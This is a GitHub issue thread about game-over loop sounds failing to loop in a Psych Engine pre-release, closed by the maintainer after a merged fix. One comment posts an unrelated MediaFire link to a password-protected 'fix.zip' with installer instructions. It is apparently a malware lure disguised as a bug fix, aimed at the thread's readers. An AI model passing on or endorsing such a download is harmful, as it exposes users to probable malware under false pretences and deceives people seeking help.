### ISSUE TITLE
(1.0 pre-release) Game Over Loop Sounds don't Loop

### ISSUE THREAD

**Issue by kentongus** [ShadowMario/FNF-PsychEngine#15425]
### Describe your bug here.

the title says it

### Are you modding a build from source or with Lua?

Lua

### What is your build target?

Windows

### Did you edit anything in this build? If so, mention or summarize your changes.

no

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ShadowMario** [comment]
Merged #15428 which fixes this
